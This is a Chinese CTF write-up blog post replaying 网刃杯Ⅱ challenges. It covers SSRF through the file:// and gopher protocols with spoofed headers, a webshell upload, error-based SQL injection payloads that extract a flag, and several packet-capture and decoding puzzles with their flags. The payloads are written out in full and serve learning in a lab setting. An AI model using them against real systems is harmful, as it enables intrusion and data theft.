[CTF]-网刃杯Ⅱ复现

ssrf_sign_in

ssrf题目 使用Goper协议
在这里插入图片描述

可以读文件

?url=file:///etc/passwd

在这里插入图片描述

翻一下arp记录,看看其他web服务

在这里插入图片描述
发现内网ip

172.73.23.100

然后使用gopher协议post传参

现在bp里修改传入的参数

在这里插入图片描述

然后进行url编码,然后把%0A换成%0D%0A,在进行url编码

因为在传参的时候Gopher会解码一次,然后GET再解码一次

POST%2520/?a=1%2520HTTP/1.1%250D%250AHost:172.73.23.100%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%25203%250D%250A%250D%250Ab=2

在这里插入图片描述

提示要本地访问,加XFF头

POST /?a=1 HTTP/1.1
Host:172.73.23.100
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For:127.0.0.1

b=2

在进行转码 替换 二次转码

POST%2520%252F%253Fa%253D1%2520HTTP%252F1.1%250D%250AHost%253A172.73.23.100%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25203%250D%250AX-Forwarded-For%253A127.0.0.1%250D%250A%250D%250Ab%253D2

在这里插入图片描述

提示要从bolean.club访问
添加Referer字段

POST /?a=1 HTTP/1.1
Host:172.73.23.100
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For:127.0.0.1
Referer:bolean.club

b=2

然后在进行编码 替换 二次转码

POST%2520/?a=1%2520HTTP/1.1%250D%250AHost:172.73.23.100%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%25203%250D%250AX-FORWARDED-FOR:%2520127.0.0.1%250D%250AReferer:bolean.club%250D%250A%250D%250Ab=2

在这里插入图片描述


upload

文件上传,首先传一个一句话木马

在这里插入图片描述

提示需要ctf类型的文件
修改文件类型为ctf

在这里插入图片描述

显示成功上传,但是不解析文件,尝试其他方法,题目描述中存在sql描述

尝试sql注入

文件名出存在sql注入

尝试报错注入

id='and(select extractvalue(1,concat('~',(select database()))))#

在这里插入图片描述

提示语句错误

这里要在 # 前面加一个)

'and(select extractvalue(1,concat('~',(select database())))))#
或者
'and(select extractvalue(1,concat('~',(select database())))) and '

尝试直接读取flag

'and(select extractvalue(1,concat('~',(select flag from flag)))))#

在这里插入图片描述

只能看到flag的前几位,读取后几位

'and(select extractvalue(1,concat('~',substr((select flag from flag),29,60)))))#

在这里插入图片描述


easyisc

wireshark打开追踪TCP

在这里插入图片描述


xyp07

在这里插入图片描述

解压密码在压缩包注释中

密码:Xyp77&7&77

wireshark打开

在这里插入图片描述

在这里插入图片描述

使用base91解码

iPE=e>we,9:={]RnBjf<7_8Cw1b

flag{welcome_S7_world_xyp07}

移动的黑客

010打开文件头异常

在这里插入图片描述

修改前四位内容

FF FF FF FF -> 0A 0D 0D 0A

打开之后找转速大于1000的内容
因为1000十六进制2710
所以找大于2710的数据包

在这里插入图片描述

68156处找到data数据大于2710的数据

hex(2766)=10086

所以flag

flag{1008668156}

ncsubj

打开数据包进行分析查看,追踪TCP流发现了三段疑似Base64字符串
在这里插入图片描述
在这里插入图片描述

anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA==

在这里插入图片描述

j|u|n|g|n|a|p|f|h|o|w|r|p|g|

使用随波逐流解码

在这里插入图片描述

rot13加密

w|h|a|t|a|n|c|s|u|b|j|e|c|t|

flag{whatancsubject}

carefulguy

打开数据包进行分析查看,追踪TCP流发现了该位置一直存在数字,疑似16进制,将其每个流的摘取出 来排除其中is a flag@那一部分

在这里插入图片描述
在这里插入图片描述

666c61677b7034757333313576337279316e7433726573746963397d

在这里插入图片描述

flag{p4us315v3ry1nt3restic9}

总结

以上就是对网刃杯Ⅱ的部分复现,
相比于网刃杯Ⅰ ,第二届的题目质量有很大的提升,ctfer的质量也有不同程度的提高,
最后就是还是很菜啊,
继续加油。


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值